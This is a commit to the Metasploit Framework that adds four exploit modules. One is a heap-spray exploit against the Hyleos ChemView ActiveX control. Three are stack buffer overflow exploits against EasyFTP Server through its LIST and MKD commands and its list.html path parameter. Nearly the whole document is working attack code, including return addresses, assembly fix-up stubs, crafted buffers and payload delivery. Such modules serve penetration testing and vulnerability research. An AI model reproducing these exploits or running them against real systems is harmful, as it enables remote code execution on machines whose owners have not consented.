add 3 easy ftp server exploits, 1 chemview activex

git-svn-id: file:///home/svn/framework3/trunk@9935 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/windows/browser/hyleos_chemviewx_activex.rb

@@ -0,0 +1,139 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = GoodRanking # heap spray :-/
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Hyleos ChemView ActiveX Control Stack Buffer Overflow',
+			'Description'    => %q{
+					This module exploits a stack-based buffer overflow within version 1.9.5.1 of Hyleos
+				ChemView (HyleosChemView.ocx). By calling the 'SaveAsMolFile' or 'ReadMolFile' methods
+				with an overly long first argument, an attacker can overrun a buffer and execute
+				arbitrary code.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Paul Craig <paul.craig[at]security-assessment.com>', # original discovery/advisory
+					'Dz_attacker <dz_attacker[at]hotmail.fr>', # original file format module
+					'jduck'   # converted HttpServer module
+				],
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'CVE', '2010-0679' ],
+					[ 'OSVDB', '62276' ],
+					[ 'URL', 'http://www.security-assessment.com/files/advisories/2010-02-11_ChemviewX_Activex.pdf' ],
+					[ 'URL', 'http://www.exploit-db.com/exploits/11422/' ]
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+					'InitialAutoRunScript' => 'migrate -f',
+				},
+			'Payload'        =>
+				{
+					'Space'         => 1024,
+					'BadChars'      => "\x00",
+					'StackAdjustment' => -3500,
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0A0A0a0A, 'Offset' => 150 } ]
+				],
+			'DisclosureDate' => 'Feb 10 2010',
+			'DefaultTarget'  => 0))
+	end
+
+	def autofilter
+		false
+	end
+
+	def check_dependencies
+		use_zlib
+	end
+
+	def on_request_uri(cli, request)
+
+		clsid = "C372350A-1D5A-44DC-A759-767FC553D96C"
+		progid = "HyleosChemView.HLChemView"
+
+		methods = [ "ReadMolFile", "SaveAsMolFile" ]
+		method = methods[rand(methods.length)]
+		method = "SaveAsMolFile"
+
+		# Re-generate the payload
+		return if ((p = regenerate_payload(cli)) == nil)
+
+		# It may be possible to create a more robust exploit, however --
+		# 1. The control's base address has been shown to vary (seen at 0x1c90000 and 0x1d90000)
+		# 2. The buffer overflow does not appear to be entirely straight forward.
+
+		# Encode the shellcode
+		shellcode = Rex::Text.to_unescape(p.encoded, Rex::Arch.endian(target.arch))
+
+		# Setup exploit buffers
+		nops 	  = Rex::Text.to_unescape([target.ret].pack('V'))
+		ret  	  = Rex::Text.uri_encode([target.ret].pack('L'))
+		blocksize = 0x40000
+		fillto    = 300
+		offset 	  = target['Offset']
+
+		# Randomize the javascript variable names
+		chemview     = rand_text_alpha(rand(100) + 1)
+		j_shellcode  = rand_text_alpha(rand(100) + 1)
+		j_nops       = rand_text_alpha(rand(100) + 1)
+		j_ret        = rand_text_alpha(rand(100) + 1)
+		j_headersize = rand_text_alpha(rand(100) + 1)
+		j_slackspace = rand_text_alpha(rand(100) + 1)
+		j_fillblock  = rand_text_alpha(rand(100) + 1)
+		j_block      = rand_text_alpha(rand(100) + 1)
+		j_memory     = rand_text_alpha(rand(100) + 1)
+		j_counter    = rand_text_alpha(rand(30) + 2)
+
+		content = %Q|<html>
+<object classid='clsid:#{clsid}' id='#{chemview}'></object>
+<script>
+#{j_shellcode}=unescape('#{shellcode}');
+#{j_nops}=unescape('#{nops}');
+#{j_headersize}=20;
+#{j_slackspace}=#{j_headersize}+#{j_shellcode}.length;
+while(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops};
+#{j_fillblock}=#{j_nops}.substring(0,#{j_slackspace});
+#{j_block}=#{j_nops}.substring(0,#{j_nops}.length-#{j_slackspace});
+while(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_block}+#{j_fillblock};
+#{j_memory}=new Array();
+for(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode};
+
+var #{j_ret}='';
+for(#{j_counter}=0;#{j_counter}<=#{offset};#{j_counter}++)#{j_ret}+=unescape('#{ret}');
+#{chemview}.#{method}(#{j_ret});
+</script>
+</html>|
+
+
+		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
+
+		# Transmit the response to the client
+		send_response_html(cli, content)
+
+		# Handle the payload
+		handler(cli)
+	end
+
+end

modules/exploits/windows/ftp/easyftp_list_fixret.rb

@@ -0,0 +1,127 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+##
+# EDB-ID: 14400
+# Date : July 5, 2010
+# Discovered by : Karn Ganeshen
+# Version : 1.7.0.11
+# Tested on : Windows XP SP3 Version 2002
+# MFR  & VAS TEAM : just testing howto convert exploits to metasploit modules.
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = GreatRanking
+
+	include Msf::Exploit::Remote::Ftp
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'EasyFTP Server <= 1.7.0.11 LIST Command Stack Buffer Overflow',
+			'Description'    => %q{
+					This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11.
+				credit goes to Karn Ganeshan.
+
+				NOTE: Although, this is likely to exploit the same vulnerability as the 
+				'easyftp_cwd_fixret' exploit, it uses a slightly different vector.
+			},
+			'Author'         =>
+				[
+					'Karn Ganeshan <karnganeshan [at] gmail.com>', # original version
+					'MFR',    # convert to metasploit format.
+					'jduck'   # modified to use fix-up stub (works with bigger payloads)
+				],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'OSVDB', '62134' ],
+					[ 'URL', 'http://www.exploit-db.com/exploits/14400/' ],
+					[ 'URL', 'http://www.exploit-db.com/exploits/14451/' ]
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'thread'
+				},
+			'Privileged'     => false,
+			'Payload'        =>
+				{
+					'Space'    => 512,
+					'BadChars' => "\x00\x0a\x0d\x2f\x5c",
+					'DisableNops' => true
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Windows XP SP3 - Version 2002',   { 'Ret' => 0x7e49732b } ], # call edi from user32.dll (v5.1.2600.5512)
+				],
+			'DisclosureDate' => 'July 5 2010',
+			'DefaultTarget' => 0))
+	end
+
+	def check
+		connect
+		disconnect
+
+		if (banner =~ /BigFoolCat/)
+			return Exploit::CheckCode::Vulnerable
+		end
+			return Exploit::CheckCode::Safe
+	end
+
+	def exploit
+		connect_login
+
+		# NOTE:
+		# This exploit jumps to edi, which happens to point at a partial version of
+		# the 'buf' string in memory. The fixRet below fixes up the code stored on the
+		# stack and then jumps there to execute the payload. The value in esp is used
+		# with an offset for the fixup.
+		fixRet_asm = %q{
+			mov edi,esp
+			mov [edi], 0xfeedfed5
+			add edi, 0xfffffff4
+			mov byte ptr [edi], 0xc0
+			add edi,4
+			mov [edi], 0xdeadbeef
+			add edi, 0xffffff24
+			add esp, 0xfffffe04
+			jmp edi
+		}
+		fixRet = Metasm::Shellcode.assemble(Metasm::Ia32.new, fixRet_asm).encode_string
+
+		buf = ''
+
+		print_status("Prepending fixRet...")
+		buf << fixRet
+		buf << make_nops(0x30 - buf.length)
+
+		print_status("Adding the payload...")
+		buf << payload.encoded
+
+		# Patch the original stack data into the fixer stub
+		buf[4, 4] = buf[268 + 8, 4]
+		buf[16, 1] = buf[268-4, 1]
+		buf[22, 4] = buf[268, 4]
+
+		print_status("Overwriting part of the payload with target address...")
+		buf[268,4] = [target.ret].pack('V') # put return address @ 268 bytes
+
+		print_status("Sending exploit buffer...")
+		send_cmd( ['LIST', buf] , false)
+
+		handler
+		disconnect
+	end
+
+end

modules/exploits/windows/ftp/easyftp_mkd_fixret.rb

@@ -0,0 +1,129 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = GreatRanking
+
+	include Msf::Exploit::Remote::Ftp
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow',
+			'Description'    => %q{
+					This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11
+				and earlier. EasyFTP fails to check input size when parsing 'MKD' commands, which
+				leads to a stack based buffer overflow.
+
+				NOTE: EasyFTP allows anonymous access by default. However, in order to access the
+				'MKD' command, you must have access to an account that can create directories.
+
+				After version 1.7.0.12, this package was renamed "UplusFtp".
+
+				This exploit utilizes a small piece of code that I\'ve referred to as 'fixRet'.
+				This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by
+				'fixing' the return address post-exploitation.  See references for more information.
+			},
+			'Author'         =>
+				[
+					'x90c',   # original version
+					'jduck'   # port to metasploit / modified to use fix-up stub (works with bigger payloads)
+				],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'OSVDB', '62134' ],
+					[ 'URL', 'http://www.exploit-db.com/exploits/12044/' ],
+					[ 'URL', 'http://www.exploit-db.com/exploits/14399/' ]
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'thread'
+				},
+			'Privileged'     => false,
+			'Payload'        =>
+				{
+					'Space'    => 512,
+					'BadChars' => "\x00\x0a\x0d\x2f\x5c",
+					'DisableNops' => true
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Windows Universal - v1.7.0.2',   { 'Ret' => 0x004041ec } ], # call ebp - from ftpbasicsvr.exe
+					[ 'Windows Universal - v1.7.0.3',   { 'Ret' => 0x004041ec } ], # call ebp - from ftpbasicsvr.exe
+					[ 'Windows Universal - v1.7.0.4',   { 'Ret' => 0x004041dc } ], # call ebp - from ftpbasicsvr.exe
+					[ 'Windows Universal - v1.7.0.5',   { 'Ret' => 0x004041a1 } ], # call ebp - from ftpbasicsvr.exe
+					[ 'Windows Universal - v1.7.0.6',   { 'Ret' => 0x004041a1 } ], # call ebp - from ftpbasicsvr.exe
+					[ 'Windows Universal - v1.7.0.7',   { 'Ret' => 0x004041a1 } ], # call ebp - from ftpbasicsvr.exe
+					[ 'Windows Universal - v1.7.0.8',   { 'Ret' => 0x00404481 } ], # call ebp - from ftpbasicsvr.exe
+					[ 'Windows Universal - v1.7.0.9',   { 'Ret' => 0x00404441 } ], # call ebp - from ftpbasicsvr.exe
+					[ 'Windows Universal - v1.7.0.10',  { 'Ret' => 0x00404411 } ], # call ebp - from ftpbasicsvr.exe
+					[ 'Windows Universal - v1.7.0.11',  { 'Ret' => 0x00404411 } ], # call ebp - from ftpbasicsvr.exe
+				],
+			'DisclosureDate' => 'Apr 04 2010',
+			'DefaultTarget' => 0))
+	end
+
+	def check
+		connect
+		disconnect
+
+		if (banner =~ /BigFoolCat/)
+			return Exploit::CheckCode::Vulnerable
+		end
+			return Exploit::CheckCode::Safe
+	end
+
+	def make_nops(num); "C" * num; end
+
+	def exploit
+		connect_login
+
+		# NOTE:
+		# This exploit jumps to ebp, which happens to point at a partial version of
+		# the 'buf' string in memory. The fixRet below fixes up the code stored on the
+		# stack and then jumps there to execute the payload. The value in esp is used
+		# with an offset for the fixup.
+		fixRet_asm = %q{
+			mov edi,esp
+			sub edi, 0xfffffe10
+			mov [edi], 0xfeedfed5
+			add edi, 0xffffff14
+			jmp edi
+		}
+		fixRet = Metasm::Shellcode.assemble(Metasm::Ia32.new, fixRet_asm).encode_string
+
+		buf = ''
+
+		print_status("Prepending fixRet...")
+		buf << fixRet
+		buf << make_nops(0x20 - buf.length)
+
+		print_status("Adding the payload...")
+		buf << payload.encoded
+
+		# Patch the original stack data into the fixer stub
+		buf[10, 4] = buf[268, 4]
+
+		print_status("Overwriting part of the payload with target address...")
+		buf[268,4] = [target.ret].pack('V') # put return address @ 268 bytes
+
+		print_status("Sending exploit buffer...")
+		send_cmd( ['MKD', buf] , false)
+
+		handler
+		disconnect
+	end
+
+end

modules/exploits/windows/http/easyftp_list.rb

@@ -0,0 +1,127 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = GreatRanking
+
+	HttpFingerprint = { :pattern => [ /Easy-Web Server\// ] }
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'EasyFTP Server <= 1.7.0.11 list.html path Stack Buffer Overflow',
+			'Description'    => %q{
+					This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11
+				and earlier. EasyFTP fails to check input size when parsing the 'path' parameter
+				supplied to an HTTP GET request, which leads to a stack based buffer overflow.
+				EasyFTP allows anonymous access by default; valid credentials are typically
+				unnecessary to exploit this vulnerability.
+
+				After version 1.7.0.12, this package was renamed "UplusFtp".
+
+				Due to limited space, as well as difficulties using an egghunter, the use of
+				staged, ORD, and/or shell payloads is recommended.
+			},
+			'Author'         =>
+				[
+					'ThE g0bL!N',   # Original exploit [see References]
+					'jduck'         # Metasploit re-implementation
+				],
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'URL', 'http://www.exploit-db.com/exploits/11500/' ]
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'thread'
+				},
+			'Privileged'     => true,
+			'Payload'        =>
+				{
+					'Space'    => 256,
+					'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20\x23\x25\x26\x2b\x2f\x3b\x3f\x5c",
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[	'Windows XP SP3 - Easy FTP Server Universal',
+						# NOTE: It's not possible to use addresses within the
+						# binary due to the nul byte.
+						{
+							'Ret'      => 0x7cc5d507  # jmp esp in shell32.dll
+							#'Ret'      => 0xdeadbeef
+						}
+					]
+				],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Feb 18 2010'
+		))
+
+		register_options(
+			[
+				Opt::RPORT(8080),
+				OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'anonymous']),
+				OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'mozilla@example.com']),
+			], self.class)
+	end
+
+	def check
+		info = http_fingerprint  # check method
+		if info and (info =~ /Easy-Web Server\//)
+			return Exploit::CheckCode::Vulnerable
+		end
+		Exploit::CheckCode::Safe
+	end
+
+
+	def exploit
+		if (payload.encoded.length > payload_space)
+			raise RuntimeError, "Insufficient space for payload, try using a staged, ORD and/or shell payload."
+		end
+
+		# Fix up ESP, jmp to the beginning of the buffer
+		stub_asm = %q{
+			mov edi, esp
+			add esp, 0xfffffc04
+			add edi, 0xfffffee8
+			jmp edi
+		}
+		stub = Metasm::Shellcode.assemble(Metasm::Ia32.new, stub_asm).encode_string
+
+		# Build the path up
+		path = ''
+		path << payload.encoded
+		path << rand_text(268 - path.length)
+		# NOTE: It's possible to overwrite SEH, however SafeSEH is in effect.
+		path << [target.ret].pack('V')
+		path << rand_text(280 - path.length)
+		path << stub
+		path << rand_text(332 - path.length)
+
+		uri = "/list.html?path="
+		uri << path
+
+		print_status("Trying target #{target.name}...")
+		res = send_request_raw({ 'uri' => uri }, 5)
+
+		if (res)
+			print_error("The server unexpectedly responded, this is not good.")
+			print_status(res.inspect)
+		end
+
+		handler
+	end
+
+end